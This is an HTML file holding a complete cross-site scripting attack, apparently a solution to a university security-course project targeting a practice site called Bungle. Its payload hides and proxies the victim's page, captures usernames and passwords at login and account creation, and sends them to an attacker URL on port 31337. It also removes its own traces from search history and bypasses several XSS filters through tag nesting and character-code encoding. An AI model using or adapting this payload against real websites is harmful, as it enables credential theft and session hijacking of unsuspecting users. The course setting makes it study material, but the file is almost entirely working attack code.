xss_payload.html

<!-- Derived from jhalderm’s solution to Part 3. -->
<meta charset="utf-8">
<script src="http://ajax.googleapis.com/ajax/libs/jquery/2.0.3/jquery.min.js"></script>
<script>
	function payload(attacker){
		function log(data){
			console.log($.param(data));
			$.get(attacker+"stolen",data);
		}
		function proxy(href,qVal,hVal){
			$("html").load(href,function(){
				var logO={event: "nav"};
				var logUser= $("#logged-in-user").text();
				if(logUser)logO["user"]=logUser;
				logO["url"]=href;
				log(logO);
				$("html").append("<script"+">"+payload.toString()+";</script"+">");
				$(".history-item").each(function(elm){
					if($(this).text().indexOf("function payload(")>= 0){
						$(this).remove();
					}
				})
				$("#query").val(qVal);
				$("#history-list").html(hVal);
				$("#bungle-lnk").on("click",function(event){
					event.preventDefault();
					var g="/project2/";
					if(location.pathname!=g){
						history.pushState({},"",g);
						proxy(g);
					}
				});
				$("#search-again-btn").on("click",function(event){
					event.preventDefault();
					var g="./";
					history.pushState({},"", g);
					proxy(g);
				});
				$("#log-in-btn").on("click",function(event){
					event.preventDefault();
					var user=$("input#username").val();
					var pass=$("#userpass").val();
					$.ajax({
						type:"POST",
						url:"./login",
						data:{username:user,password:pass}
					})
					.done(function(){
						log({event:"login",user:user,pass:pass});
						proxy("./");
					});
				});
				$("#log-out-btn").on("click",function(event){
					event.preventDefault();
					$.ajax({
						type:"POST",
						url:"./logout"
					})
					.done(function(){
						log({event:"logout",user:logUser});
						var g="/project2/";
						if(location.pathname!= g){
							history.pushState({},"", g);
						}
						proxy(g);
					});
				});
				$("#new-account-btn").on("click",function(event){
					event.preventDefault();
					var user=$("input#username").val();
					var pass=$("#userpass").val();
					$.ajax({
						type:"POST",
						url:"./create",
						data:{username:user,password:pass}
					})
					.done(function(){
						log({event:"login",user:user,pass:pass});
						proxy("./");
					});
				});
				$("#search-btn").on("click",function(event){
					event.preventDefault();
					var obj=history.state;
					obj["query"]=$("#query").val();
					history.replaceState(obj,"",location.pathname);
					var g="./search?q="+encodeURIComponent($("#query").val()).replace(/%20/g,"+");
					history.pushState(obj,"",g);
					proxy(g);
				});
				$(".history-item.list-group-item").on("click",function(event){
					event.preventDefault();
					var obj=history.state;
					obj["hVal"]=$("#history-list").html();
					history.replaceState(obj,"",location.pathname+location.search);
					var g="./search?q="+encodeURIComponent($(this).text()).replace(/%20/g,"+");
					history.pushState({},"",g);
					proxy(g);
				});
				$("html").show();
			});
		}
		$("html").hide();
		proxy("./");
		history.replaceState({},"","/project2/");
		$(window).on("popstate", function(event){
			if(event.originalEvent.state!=null){
				proxy(location.href,event.originalEvent.state["query"],event.originalEvent.state["hVal"]);
			}
		});
	}
	function s2c(input){
		var c="";
		for(var i=1;i<input.length-2;++i){
			c+=input.charCodeAt(i)+",";
		}
		c+=input.charCodeAt(input.length-2);
		c="String.fromCharCode("+c+")";
		return c;
	}
	function processStrings(code){
		var regex=/\"[^\"]*\"/;
		var subString=regex.exec(code);
		while(subString!=null){
			code=code.replace(regex,s2c(subString.toString()));
			subString=regex.exec(code);
		}
		return code;
	}
	function makeLink(xssdefense,target,attacker) {
		var link=target+"./search?xssdefense="+xssdefense.toString()+"&q="+
				encodeURIComponent("<script" + ">"+payload.toString() +
								   ";payload(\"" + attacker + "\");</script" + ">");
		if (xssdefense == 0) {
			return link;
		}
		else if (xssdefense == 1) {
			return link.replace(/script/gi, "scrscriptipt");
		}
		else if (xssdefense == 2) {
			return link.replace(/script/gi, "scrscriptipt");
		}
		else if (xssdefense == 3) {
			link = target + "./search?xssdefense=" + xssdefense.toString() + " &g=1&q=";
			var link2 = "<script" + ">" + payload.toString() + ";payload(\"" + attacker + "\");</script" + ">";
			link2 = processStrings(link2);
			link2 = link2.replace(/;/g, " ");
			link2 = link + encodeURIComponent(link2);
			return link2;
		}
	}
	var target = "http://eecs388.org/project2/";
	var attacker = "http://127.0.0.1:31337/";
	$(function() {
		for (var xssdefense = 0; xssdefense < 4; xssdefense++) {
		var url = makeLink(xssdefense, target, attacker);
		$("body").append("<h3><a target=\"run\" href=\"" + url + "\" id=\"try_link\">Try Bungle! xxsdefense=" + xssdefense.toString() + "</a></h3>");
		};
	});
</script>